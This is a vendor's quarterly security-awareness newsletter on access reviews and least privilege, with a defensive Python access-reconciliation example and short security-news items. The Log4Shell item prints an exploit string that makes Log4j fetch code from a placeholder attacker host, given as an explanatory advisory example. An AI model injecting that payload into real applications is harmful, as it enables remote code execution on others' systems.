TCT is committed to helping you keep your organization secure and compliant. Every quarter, we publish compliance and security insights that you can share with your employees to fulfill periodic security reminder requirements your organization may be subject to.
As an added bonus, we’ve highlighted some developing security trends and featured a quick tip to get more out of your compliance management.
Access Control and Password Management Best Practices
Password management is a critical part of your company’s security, and it involves more than keeping an up-to-date list of your employees. If you don’t actively control who has access to what, you end up with a rat’s nest of permissions: people holding access they should never have had, and possibly people who should have no access at all still able to get into your systems.
Most compliance standards require sound access control and password management. No matter what compliance framework you’re using, follow these best practices to keep your company safe.
Create password management policies and processes for any possible scenario when someone needs a change in their access. For example:
- New hire (access addition)
- New role in the company (access change)
- Termination of employment (access removal)
Any request for a change to access must come from authorized management — no one should be able to request new access for themselves. The request should denote what systems and what levels of access are needed for the individual. Validate that they actually end up with the proper permissions, as requested. Never give anyone more access than absolutely necessary.
When provisioning a new account, deliver the user’s initial password securely and force a change at first login by setting the account to require it. No one in IT, or anywhere else in the company, should know another person’s password.
When roles change and new permissions are needed, remove the permissions that are no longer needed at the same time. People should not accumulate ever-greater levels of access through successive role changes; keep each account to exactly what the current job requires. Employees should not have access to information they do not need, such as customers’ sensitive data, and if an employee’s credentials are compromised, tight permissions limit how much data is exposed.
When people leave your company, revoke their access immediately. If someone is being terminated, their access should be removed while they are receiving the news. Most people would never do anything nefarious, but this policy protects you from the one person in a hundred who would misuse lingering access. Track each employee’s provisioning and access so that you know exactly what must be shut down when they leave.
You may have many access changes over the course of a year, and it’s easy for details to slip through the cracks. Most compliance standards require a periodic access review (quarterly is a common cadence) to confirm that every account is correct and holds the right permissions: that everything that should have been shut down has been, and that no one holds permissions they no longer need. Reconciling the identity system’s account export against the HR roster and a per-role permission baseline is the most reliable way to do this.
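The reconciliation described above, as an added example (this is not code from the article or from TCT Portal): it compares a constructed HR roster and role baseline against a constructed account export and reports leavers whose accounts are still live, active staff holding permissions beyond their current role, accounts with no HR owner, and active staff with no account at all. The role names, permission strings and employee ids are illustrative assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass

# ---- Constructed sample inputs (illustrative only, not real data) ----

# HR system of record: employee id -> (current role, employment status)
HR_ROSTER = {
    "e101": ("support", "active"),
    "e102": ("billing", "active"),
    "e103": ("engineer", "active"),     # moved from support to engineering last quarter
    "e104": ("billing", "terminated"),  # left the company; access should already be gone
}

# Approved permission baseline per role (least privilege: only what the job needs)
ROLE_BASELINE = {
    "support":  {"ticketing:read", "ticketing:write"},
    "billing":  {"ticketing:read", "payments:read", "payments:refund"},
    "engineer": {"ticketing:read", "repo:write", "prod-db:read"},
}

# Export from the identity provider / directory: what accounts actually hold today
ACCOUNT_EXPORT = [
    {"user": "e101", "enabled": True, "perms": {"ticketing:read", "ticketing:write"}},
    {"user": "e102", "enabled": True, "perms": {"ticketing:read", "payments:read", "payments:refund", "prod-db:read"}},
    {"user": "e103", "enabled": True, "perms": {"ticketing:read", "ticketing:write", "repo:write", "prod-db:read"}},
    {"user": "e104", "enabled": True, "perms": {"payments:refund"}},
    {"user": "svc-legacy", "enabled": True, "perms": {"prod-db:read"}},
]


@dataclass(frozen=True)
class Finding:
    user: str
    kind: str               # leaver_still_active | excess_permissions | no_owner | missing_account
    perms: tuple[str, ...]  # permissions to remove (or, for missing_account, to provision)


def review_access(roster, baseline, accounts) -> list[Finding]:
    """Reconcile the account export against HR and the role baseline.

    Flags (1) leavers whose accounts are still enabled or still hold permissions,
    (2) active staff holding permissions outside their current role (the
    accumulation that follows a role change), (3) accounts with no HR owner,
    and (4) active staff with no account at all (a provisioning gap).
    """
    findings: list[Finding] = []
    seen: set[str] = set()
    for acct in accounts:
        uid = acct["user"]
        seen.add(uid)
        held = set(acct["perms"])
        if uid not in roster:
            findings.append(Finding(uid, "no_owner", tuple(sorted(held))))
            continue
        role, status = roster[uid]
        if status != "active":
            if acct["enabled"] or held:
                findings.append(Finding(uid, "leaver_still_active", tuple(sorted(held))))
            continue
        excess = held - baseline.get(role, set())
        if excess:
            findings.append(Finding(uid, "excess_permissions", tuple(sorted(excess))))
    for uid, (role, status) in roster.items():
        if status == "active" and uid not in seen:
            findings.append(Finding(uid, "missing_account", tuple(sorted(baseline.get(role, set())))))
    return findings


def findings_by_user(findings: list[Finding]) -> dict[str, Finding]:
    """Index findings by account for quick lookup in a review meeting."""
    return {f.user: f for f in findings}


if __name__ == "__main__":
    for f in review_access(HR_ROSTER, ROLE_BASELINE, ACCOUNT_EXPORT):
        print(f"{f.user:12} {f.kind:22} {', '.join(f.perms)}")
```

Run against the sample data, the review lists e102’s stray prod-db:read, the ticketing:write that e103 carried over from the support role, the terminated e104 still enabled with a refund permission, and a service account nobody in HR owns; e101 is clean. In practice the roster and export come from your HR and identity systems, and the baseline is the document your management approves when they authorize access.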
Quick Tip: Customize Your Directional Compliance Criteria
If you’re following a directional standard like HIPAA, SOC 2, or CCPA, TCT Portal solves a common problem you’re probably facing. On the one hand, it’s nice to have the flexibility to determine the controls that work best for you — but now you have to document exactly what they are, how you’ll accomplish them, and how to test their effectiveness.
The controls you establish need to be granular enough that the Assessor can test what you’re doing. Documenting controls for directional standards can be hard to manage: typically you have to record both the controls and their validation tests in detailed notes. TCT Portal gives you a flexible, streamlined option.
TCT Portal lets you define your control objectives (the requirements that are to be met) and then define how to test them — within the compliance management tool itself. This functionality introduces significant flexibility to customize directional standards to fit your unique organization. It increases TCT Portal’s effectiveness for you and maximizes your collaboration with Assessors.
This feature also gives you the flexibility to create a tracking mechanism that you can use alongside all of your other industry-standard certifications. For directional standards, you define all of the control and testing elements yourself; for a very prescriptive standard such as PCI DSS, you use the same compliance management tool to accomplish its compliance objectives.
What’s Going on in Security Today
Log4Shell (CVE-2021-44228), a flaw in the Apache Log4j 2 logging library, is one of the most widespread vulnerabilities ever discovered; nearly 40% of corporate networks were estimated to be exposed in some capacity. Because Log4j is an open-source library embedded in countless applications and appliances (the average application today pulls in roughly 528 open-source components), it became a focal point of attacks on modern infrastructure. It is a remote code execution vulnerability: an attacker who can get a crafted string such as "${jndi:ldap://attacker-host/x}" into any field the application logs (a User-Agent header, a username, a chat message) causes Log4j to perform a JNDI lookup and load attacker-controlled code. Within 24 hours of public disclosure, more than 60 obfuscated variations of the original exploit string were already circulating, which is why simply searching logs for the literal text "${jndi:" is not enough.
A rootkit has been discovered that specifically targets HP’s Integrated Lights-Out (iLO) server management technology. It tampers with the iLO firmware modules and has been used to wipe the disks of infected systems. Because iLO is a management controller with its own processor and firmware, it sits beneath the host operating system, can reach the server’s hardware, firmware, software and OS, and keeps running even when the host is powered down; malware that gets into it survives OS reinstalls and disk replacement and is invisible to host-based security tools. That persistence is what makes HP servers with exposed or unpatched iLO such an attractive target. Keep iLO firmware current and keep its network interface off the internet, on a dedicated management network.
Microsoft patched 881 vulnerabilities this year, fewer than last year but still a high number. Early in the year came the Exchange Server vulnerabilities (ProxyLogon), most notably exploited by Hafnium, a state-sponsored Chinese hacking group. Then came the Print Spooler vulnerability called PrintNightmare, a remote code execution bug that let any authenticated user run code with SYSTEM-level privileges on affected systems.
LastPass, the password management tool owned by LogMeIn, recently reported a credential-stuffing attack against its users. Credential stuffing is the large-scale, automated replay of username and password pairs (usually leaked from other breaches) against an application’s login page; it works because people reuse passwords. A password manager concentrates that risk in a single credential: the user remembers one master password, and once the vault is unlocked the manager fills the rest of their usernames and passwords into the appropriate websites. LastPass is therefore urging users to choose long, complex master passwords that are not used anywhere else, and enabling multifactor authentication on the vault blunts stuffing attacks even when a password does leak.
Garrett walk-through metal detectors allow remote attacks. Vulnerabilities in the network module used by the PD 6500i and MZ 6100 models allowed an attacker on the network to gain remote access to the device and execute arbitrary commands, including changing its sensitivity: set ultra-high, it alarms on everything; set to nothing, it lets dangerous items past the checkpoint it is supposed to enforce. It is a reminder that physical security devices on the network are IT assets and need the same patching and segmentation as everything else, because virtual manipulation can cause physical harm.